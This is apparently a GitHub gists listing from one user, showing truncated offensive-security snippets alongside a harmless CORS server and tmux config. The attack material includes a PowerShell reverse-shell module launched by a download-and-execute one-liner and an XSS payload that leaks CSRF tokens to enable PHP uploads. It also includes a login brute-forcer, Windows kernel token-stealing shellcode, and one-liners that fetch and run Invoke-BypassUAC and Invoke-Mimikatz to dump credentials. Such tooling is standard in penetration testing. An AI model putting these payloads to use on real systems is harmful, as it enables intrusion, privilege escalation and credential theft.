@amriunix
amriunix / Invoke-Go.ps1
Last active October 4, 2021 14:18
Invoke-Go PowerShell Module
# Invoke-Go: REV-PSH
# powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://<URL>/Invoke-Go.ps1');Invoke-Go -Back -IPAddress 192.168.216.129 -Port 443"
function Invoke-Go
{
[CmdletBinding(DefaultParameterSetName="back")]
Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="back")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="onit")]
[String]
$IPAddress,
@amriunix
amriunix / zipper.py
Created April 6, 2020 11:54
Python script to demonstrate the Zip Slip
#!/usr/bin/python
import zipfile
from cStringIO import StringIO
def _build_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('folder/file.txt', 'This is just a text file!')
z.writestr('code.php', '<?php phpinfo(); ?>')
@amriunix
amriunix / SimpleHTTPServer-CORS.py
Created March 29, 2020 15:12
Python3 HTTP Server to enable CORS (Cross-Origin Resource Sharing)
#!/usr/bin/env python3
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
import sys
class CORSRequestHandler (SimpleHTTPRequestHandler):
def end_headers (self):
self.send_header('Access-Control-Allow-Origin', '*')
SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
    # Serve the current directory with the CORS header; the port comes from the
    # first CLI argument and falls back to 8000 (assumed default) when none is given.
    test(CORSRequestHandler, HTTPServer, port=int(sys.argv[1]) if len(sys.argv) > 1 else 8000)
@amriunix
amriunix / Advanced-XSS.js
Last active July 14, 2023 09:41
Some XSS payloads for file upload: leaking CSRF tokens, updating settings and triggering files
function updateConfig(csrf) {
xhr = new XMLHttpRequest();
xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf;
xhr.send(configPayload);
}
function getCSRF() {
@amriunix
amriunix / proxy.py
Created March 23, 2020 21:08
Simple HTTP Proxy
#!/usr/bin/python3
from flask import Flask, request
import requests
import base64
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
URL = 'http://Victim.com/vuln.php'
Host = 'Victim.com'
#!/usr/bin/python3
import threading
import time
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
URL = 'http://192.168.25.130:9090/login.php'
Host = 'atutor'
Users = ['Guest','Admin','Test']
[bits 64]
global _start
section .text
_start:
mov r9, qword [gs:0x188] ; Pointing at _KTHREAD structure
mov r9, qword [r9 + 0x220] ; Pointing at _KPROCESS/_EPROCESS structure
mov r8, qword [r9 + 0x3e8] ; Saving the Parent PID in r8 / you can change it directly with a PID value from your choice !
mov rax, r9 ; Saving the _KPROCESS/_EPROCESS address
@amriunix
amriunix / CheatSheet.ps1
Created January 19, 2020 21:00
Collection of PowerShell One-liners
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@amriunix
amriunix / upload.php
Last active August 9, 2022 07:00
PHP Upload file
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<input type="file" name="file"><br />
<input type="submit" value="Upload">
# 0 is too far from ` ;)
set -g base-index 1
# Remap prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b
# Quality of the life stuff
set -g history-limit 10000